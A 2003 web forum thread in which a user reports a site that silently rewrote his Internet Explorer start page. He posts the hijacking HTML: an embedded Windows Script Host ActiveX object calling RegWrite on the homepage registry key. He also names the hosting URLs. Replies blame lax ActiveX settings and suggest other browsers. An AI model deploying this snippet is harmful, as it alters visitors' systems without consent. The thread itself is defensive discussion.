SitePoint Sponsor

User Tag List

Results 1 to 4 of 4
  1. #1
    SitePoint Member
    Join Date
    Sep 2003
    Location
    Indiana
    Posts
    4
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Lightbulb Malicious javascript - Auto Set Homepage and RegWrite

    Thought that some of you may find this interesting. I plan on reporting this somewhere, but I need some direction. Webhost is dedicated and probably privately hosted, I assume that this is ISP abuse anyways.

    No alerts or anything warning that my registry was being written to and I am using IE6 with WinXP with updated virus software. I know that there were older versions like this, but I thought that the IE patch fixed the vulnerability.

    I looked for the code that changed my homepage settings and it was obfuscated. I believe that the ofusucated HEX code in the link works with this ActiveX coding below. Here it is below anyways.
    Don't open this page if you don't want to get pissed (you will get popups and a borderless fulsized window the code is in this page:
    http://www.passthison.com/security/?st-in-1

    The code in that page points to a .hta file (hypertext-application) and is executed by a cgi file at: http://object.passthison.com/vu083003/object.cgi

    Anyways, here's the code:

    <html>
    <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
    <script>
    wsh.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://www.passthison.com/r4/?vu083003-final-destination-redirect-to------------http://www.new-default-homepage339890002228333933989000222833393398900022283339339890002228333933989000222833393398900022283339.net")
    </script>
    </html>
    Last edited by iwpgroup; Oct 2, 2003 at 23:34.

  2. #2
    Perl/Mason Guru Flawless_koder's Avatar
    Join Date
    Feb 2002
    Location
    Gatwick, UK
    Posts
    1,206
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    This should only work in Internet Explorer ( I'm not saying it'll only work on IE's homepage, that much is obvious, but rather that other browsers don't allow this kind of thing to happen... not to mention that they don't support windows script host ).

    On top of that: This works on an embedded activeX object. It's just the same as if it was dynamically created using jscript.
    Therefore if it did anything to your pc it's cos your security isn't set up properly.

    Go to tools->internet options->security->custom level.

    Check the settings for when active X is allowed to run.

    Better yet - swap to Mozilla

    HTH

    G
    ---=| If you're going to buy a pet - get a Shetland Giraffe |=---

  3. #3
    SitePoint Member
    Join Date
    Sep 2003
    Location
    Indiana
    Posts
    4
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Flawless_koder
    This should only work in Internet Explorer
    I hear you, I just think that this type of thing on the web is insulting, and a big invasion. We all complain about spyware and how companies track our steps on the net. These are the things that we all should start paying more attention to.

    Did you check out the homepage and what it said about complaints. I think that you would roll...

    Best,

    Mike

  4. #4
    I'll take mine raw silver trophy MikeFoster's Avatar
    Join Date
    Dec 2002
    Location
    Alabama, USA
    Posts
    2,560
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Better yet - swap to Mozilla
    Or Opera

    Therefore if it did anything to your pc it's cos your security isn't set up properly.

    Go to tools->internet options->security->custom level.

    Check the settings for when active X is allowed to run.
    Exactly right. I threw together a page to test your IE ActiveX security setttings. The page is safe it won't do anything until you click a button, then it tries to change your home-page to itself.

    Other resources:

    How to Stop an ActiveX Control from Running in Internet Explorer (*** I don't advise doing this unless you really, really, really know what you're doing! ***)

    Manipulating the registry with WSH

    Security Resource


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •